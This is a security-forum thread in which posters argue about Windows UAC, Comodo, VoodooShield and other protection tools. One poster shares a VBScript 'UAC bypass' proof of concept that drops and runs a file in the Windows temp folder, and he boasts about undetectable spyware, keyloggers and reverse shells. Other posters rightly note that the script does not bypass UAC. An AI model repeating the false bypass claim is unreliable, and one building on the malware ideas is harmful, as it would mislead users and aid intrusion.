UAC Mode can be bypassed!

[(BlackBox) Hacker]

Same as me really! You should try using Applocker its really the bomb hahaha, I recommend using the Powershell for Applocker!

if they really want full control of their system against any attack vectors:

any HIPS/BB-based softs (Comodo, Online Armor, Defensewall) or anti-executable (NVT ExeradarPro or Appguard)

i personally use Comodo IS + Appguard on my main machine.

 

[(BlackBox) Hacker]

Yep when people can do socket programming in c or c++, this means my Spyware is 100% Undetectable from AV's!

Ncat is indeed quite efficient.

 

[illumination]

Im impressed With Admin rights, you can indeed infect your own system..

 

[(BlackBox) Hacker]

With UAC enabled is this just great? Better on my Computer than some poor sods computer! I'm not sure if I have finished testing security now? The road has just ended and Windows 8 Pro is still a target Operating System for hacking! This means you don't have to pay the big boys for signed Malware Software no more!

http://www.digicert.com/code-signing/

Im impressed With Admin rights, you can indeed infect your own system..

 

[Deleted member 178]

Because I couldn't test the Software for any security flaws what so ever, does this sound strange to you? It's like the vender wanted your money for no protection ever!

just installed VS on a VM; i got the usual 15 days trial period. maybe you used it already on your system or sth went wrong.

 

[(BlackBox) Hacker]

I really hate VoodooShield junk, I also got this rubbish! It's not even trusted Software to me such as Comodo!

just installed VS on a VM; i got the usual 15 days trial period. maybe you used it already on your system or sth went wrong.

 

[Deleted member 178]

so you have 15 days to test it

 

[nissimezra]

I really hate VoodooShield junk, I also got this rubbish! It's not even trusted Software to me such as Comodo!

its all about money. they will sale u stories about safety security and at the end of the day you have everything u need bilt in your OS

 

[Deleted member 178]

I really hate VoodooShield junk, I also got this rubbish! It's not even trusted Software to me such as Comodo!

lol; because you don't know it or know how to use it so you bash it?

 

[Ink]

I really hate VoodooShield junk, I also got this rubbish! It's not even trusted Software to me such as Comodo!

Did you even try to resolve the issue by contacting the developers? Or because it doesn't work, it's automatically junkware? (Like UAC, as you claim).

Comodo is far from the most trusted vendor.

 

[(BlackBox) Hacker]

Yep give me the key I'll test the VoodooShield crap else option two, because there are better Software out there! I just test security not crack Software hahahaha! I don't bash any Software I can tell you that for sure, but I will really bash my Malware on the rubbish protection if it fails?

lol; because you don't know it or know how to use it so you bash it?

It's just not worth the time testing VoodooShield, all the vendor wants is your money and you can't test it? What Antivirus Vendors do is to let your try it for free for one Month, before you buy or purchase it! You are correct Voodooshield to me is automatically junkware and it's not worth any time for testing!!! I'm also a Software Developer why should I also contact some dumb Software Developer who don't care about there customers? Who also remembers PC Tools HIPS called Threatfire? This was a fully featured working HIPS Freeware Software! I have tested Threatfire many Years back as one of the best HIPS Software in the wild ever than Voodooshield!

My Product: http://www.downloadatlas.com/freeware-c5db1872.html

http://www.wilderssecurity.com/threads/the-end-of-threatfire.333916/

RIP Threatfire!

Did you even try to resolve the issue by contacting the developers? Or because it doesn't work, it's automatically junkware? (Like UAC, as you claim).

Comodo is far from the most trusted vendor.

 

[Deleted member 178]

It's just not worth the time testing VoodooShield, all the vendor wants is your money and you can't test it? What Antivirus Vendors do is to let your try it for free for one Month, before you buy or purchase it! You are correct Voodooshield to me is automatically junkware and it's not worth any time for testing!!! I'

all developers are not rich corporations, so they give what they can, 15 days is enough to evaluate a simple product like VoodooShield; if you can't in 15 days so you have a problem; i needed 2 days to evaluate its potential. Also if you need a license, just contact the developer on Wilders forum , he will surely give you one. I guessed you didn't even tried.

also a Software Developer why should I also contact some dumb Software Developer who don't care about there customers?

you seriously don't know what you are talking about.

Who also remembers PC Tools HIPS called Threatfire? This was a fully featured working HIPS Freeware Software! I have tested Threatfire many Years back as one of the best HIPS Software in the wild ever than Voodooshield!

Threathfire is not an HIPS , it is a Behavior Blocker, the only one able to compete with Mamutu of emsisoft (now part of EAM)... Voodooshield is not an HIPS but an Anti-executable. please get informed before talking about something.

My Product:

Also can you stop advertising your product (you were warned already) . we are not a selling website. The way, you "judge" other products without even testing them don't give me the necessary trust and envy to try or recommend your product.

Thanks

 

[(BlackBox) Hacker]

Threatfire is a HIPS based Software I clearly remember this!!!

all developers are not rich corporations, so they give what they can, 15 days is enough to evaluate a simple product like VoodooShield; if you can't in 15 days so you have a problem; i needed 2 days to evaluate its potential. Also if you need a license, just contact the developer on Wilders forum , he will surely give you one. I guessed you didn't even tried.



you seriously don't know what you are talking about.



Threathfire is not an HIPS , it is a Behavior Blocker, the only one able to compete with Mamutu of emsisoft (now part of EAM)... Voodooshield is not an HIPS but an Anti-executable. please get informed before talking about something.




Also can you stop advertising your product (you were warned already) . we are not a selling website. The way, you "judge" other products without even testing them don't give me the necessary trust and envy to try or recommend your product.

Thanks

You can now test your UAC Mode with this very simple VBScript, paste all the script in a notepad program in Windows and save as ".vbs" and that's it, You can also compile it as well.

' UAC asInvoker POC Test! - created by (BlackBox) Hacker
' Written on 18/05/2014
' I have left this as a VBScript, so you know it's not a ViRuS as such!!!!

Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, path, malware, file, test
' // Bypassing UAC using asInvoker or just run this Script!
Set fso = CreateObject("Scripting.FileSystemObject")
Set malware = fso.CreateTextFile("c:\Windows\temp\malware.vbs", True)
malware.WriteLine("' // Malware binary executable code goes here!")
malware.WriteLine("")
malware.WriteLine("' Write, Read, Copy, Execute")
malware.WriteLine("")
malware.WriteLine("Set WshShell = WScript.CreateObject(""WScript.Shell"")")
malware.WriteLine("WshShell.Run ""calc""")
malware.Close
If fso.FileExists("c:\Windows\temp\malware.vbs") Then
Set file = fso.GetFile("c:\Windows\temp\malware.vbs")
path = UCase(file.Path)
WScript.Echo ("UAC asInvoker POC Test exploited!" & "   Path: '" & path & "'")
Set file = fso.OpenTextFile("c:\Windows\temp\malware.vbs", ForReading)
code = file.ReadAll
WScript.Echo (code)
test = MsgBox ("Would you like to test exploit now?", 65, "Security Test!")
If test = 1 Then
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "c:\Windows\temp\malware.vbs"
Else
End If
Else
WScript.Echo ("UAC asInvoker POC Test passed!")
End If

You can run the Script just the same as the compiled version!

This means the UAC has been bypassed!

This shows the code written to the hard drive, and the examples like Write, Read, Copy ect. functions that can be run through the UAC!

If you want to run the exploit or skip it if you wish?

The payload shows on Windows very cool, the programs still runs with limited user rights, but if you make a Keylogger and a Reverse Shell? You can get the keystrokes passed a Firewall and Router!

Verdict: I would most definitely use Applocker for Windows and the cost 100% free, so if you block the executable files? Then you are safe without using the UAC Mode. It also looks like Spy Shelter does not block all of the exploits as well!

I've just tested my sisters PC, this looks about right!

This Screenshot shows Comodo's Auto Sandboxing on restricted settings!

 

[Oxygen]

Waste of money? Not at all. Two of those I got for free.

Waste of Resources? Only little.

Damage because of installation? Not really.

Not really needed : Yes
Not worth installing : Yes

In my opinion.

 

[Littlebits]

If a user doesn't have better knowledge to run an unknown VBScript on their system then they deserve what whatever infection it serves them. Trying running this on a Limited User account or a remote system, I bet it will not work. Advanced products like UAC replacements, Anti-executable software and HIPS are too complicated for most users because they don't need them, the users that do know how to use these advanced products should know how to safely download files from trusted sources therefore they don't need them either. As I have said many times before, malware doesn't just magically appear on your system, you must manually download an infected file and manually run it. If you are too ignorant to know this then you will be too ignorant to learn how to use advanced security products.

Using hack tools on your system proves nothing at all if you are running on an Admin account, an Administrator should know better to run suspicious files anyway. If not then it is time to move to a Limited User account until they do.

Threatfire is a Behavior Blocker, it did not have full HIPS. I will agree it was an excellent product is its days.

Enjoy!!

 

[(BlackBox) Hacker]

My sister is not an expert, but as you can see on her computer I have setup the Sandbox the correct way to deal with any threats, what a load of rubbish you type also the vbs script file is required, because people know what they are running is 100% safe! You have a game mode on the Comodo Software for less prompts! So you want basic users to get infected without any protection what so ever this includes a Sandbox? This is my own opinion of what you have just said! If you don't like the security solutions here? Why don't you just suggest new solutions for 100% free? And if I have not been very clear? The solutions here are for the Administrator account only! Anyways you like to be the one to slag off the best people don't you Super Moderator? Well I guess I can't change everybody's mind that is impossible? What amazes me is that a large group here slag off or bash the word I here a lot on this thread Comodo why? Is this thread now is just for people who are internet trxlls woops I can't say this word I've read your Policy!!! If you want to post anything else? I will not reply back, because it's not worth coming back to this site anymore!

Critic critic critic critic critic critic

http://en.wikipedia.org/wiki/Critic

If a user doesn't have better knowledge to run an unknown VBScript on their system then they deserve what whatever infection it serves them. Trying running this on a Limited User account or a remote system, I bet it will not work. Advanced products like UAC replacements, Anti-executable software and HIPS are too complicated for most users because they don't need them, the users that do know how to use these advanced products should know how to safely download files from trusted sources therefore they don't need them either. As I have said many times before, malware doesn't just magically appear on your system, you must manually download an infected file and manually run it. If you are too ignorant to know this then you will be too ignorant to learn how to use advanced security products.

Using hack tools on your system proves nothing at all if you are running on an Admin account, an Administrator should know better to run suspicious files anyway. If not then it is time to move to a Limited User account until they do.

Threatfire is a Behavior Blocker, it did not have full HIPS. I will agree it was an excellent product is its days.

Enjoy!!

 

[illumination]

My sister is not an expert, but as you can see on her computer I have setup the Sandbox the correct way to deal with any threats, what a load of rubbish you type also the vbs script file is required, because people know what they are running is 100% safe! You have a game mode on the Comodo Software for less prompts! So you want basic users to get infected without any protection what so ever this includes a Sandbox? This is my own opinion of what you have just said! If you don't like the security solutions here? Why don't you just suggest new solutions for 100% free? And if I have not been very clear? The solutions here are for the Administrator account only! Anyways you like to be the one to slag off the best people don't you Super Moderator? Well I guess I can't change everybody's mind that is impossible? What amazes me is that a large group here slag off or bash the word I here a lot on this thread Comodo why? Is this thread now is just for people who are internet trxlls woops I can't say this word I've read your Policy!!! If you want to post anything else? I will not reply back, because it's not worth coming back to this site anymore!

Critic critic critic critic critic critic

http://en.wikipedia.org/wiki/Critic

I just cleaned a system not long ago that was running CIS, and guess what... It was infected. Would you like to take a guess how?
The person that was on it at the time it got infected, was not very computer savvy either, and when they wanted to download a lot of "what they thought" were cool programs, CIS did its job and threw up pop ups, well.. The user "Allowed" those things through CIS by clicking allow instead of sandbox or block..

This is what those that have said something to you are trying to point out, it is ultimately the user that determines if one remains malware free or not..

 

[Littlebits]

I just cleaned a system not long ago that was running CIS, and guess what... It was infected. Would you like to take a guess how?
The person that was on it at the time it got infected, was not very computer savvy either, and when they wanted to download a lot of "what they thought" were cool programs, CIS did its job and threw up pop ups, well.. The user "Allowed" those things through CIS by clicking allow instead of sandbox or block..

This is what those that have said something to you are trying to point out, it is ultimately the user that determines if one remains malware free or not..

With Comodo and other advanced HIPS security products users often get confused because they will have so many false positives blocking or sandboxing many safe process, the user think its just another false detection and manually allows it or disables to security product to allow it to run. I have seen this many times on my customers system, these advanced security programs were only blocking safe processes and still was not protecting these customers. In my opinion they are not worth messing with when a Limited User Account works just as good and doesn't block safe processes. These advanced HIPS products have failed each time on most users systems, the only users that can really tell the difference between these false detections and determine the correct action to take is the highly advanced users which should already know better then to download and run suspicious files. I'm sorry paranoid users and fanboys but it is the truth.

Enjoy!!

 

[(BlackBox) Hacker]

You are right, but Comodo's default settings have to be setup by an expert for the basic user. This is my point I'm trying to prove, you don't just install stuff without testing it first and without knowing Comodo's setup. The only problem is if you want Comodo to work right, you have to test it first with Spy Shelter Test Tool. But you try editing the restricted setting in the Sandbox and the infection the user had last time wouldn't of worked. This Screenshot shows write access was blocked and executable also restricted! But only true experts only know about the Sandbox problem on Comodo, because it's not a very big problem, it just shows that you need to manually set things. But not apply the HIPS with the Sandbox at the same time! If you want to use just the Sandbox? It's just good for the basic user, but if you are advanced user? Then you could only use the HIPS without Sandbox option? Comodo just blocks better than your UAC!

But also for a basic Computer user, if you think Software don't protect? Then recommend Guest or Limited User accounts. But if it's the users computer not yours then would the user need the Administrator account as well? The answer would be yes! And people like Littlebits can blame Comodo all they want just like a 2 Year old! "Why don't this toy work for me it's Comodo not me?"

I just cleaned a system not long ago that was running CIS, and guess what... It was infected. Would you like to take a guess how?
The person that was on it at the time it got infected, was not very computer savvy either, and when they wanted to download a lot of "what they thought" were cool programs, CIS did its job and threw up pop ups, well.. The user "Allowed" those things through CIS by clicking allow instead of sandbox or block..

This is what those that have said something to you are trying to point out, it is ultimately the user that determines if one remains malware free or not..

 

[(BlackBox) Hacker]

WOW what an expert not, I bet you don't test security much?

With Comodo and other advanced HIPS security products users often get confused because they will have so many false positives blocking or sandboxing many safe process, the user think its just another false detection and manually allows it or disables to security product to allow it to run. I have seen this many times on my customers system, these advanced security programs were only blocking safe processes and still was not protecting these customers. In my opinion they are not worth messing with when a Limited User Account works just as good and doesn't block safe processes. These advanced HIPS products have failed each time on most users systems, the only users that can really tell the difference between these false detections and determine the correct action to take is the highly advanced users which should already know better then to download and run suspicious files. I'm sorry paranoid users and fanboys but it is the truth.

Enjoy!!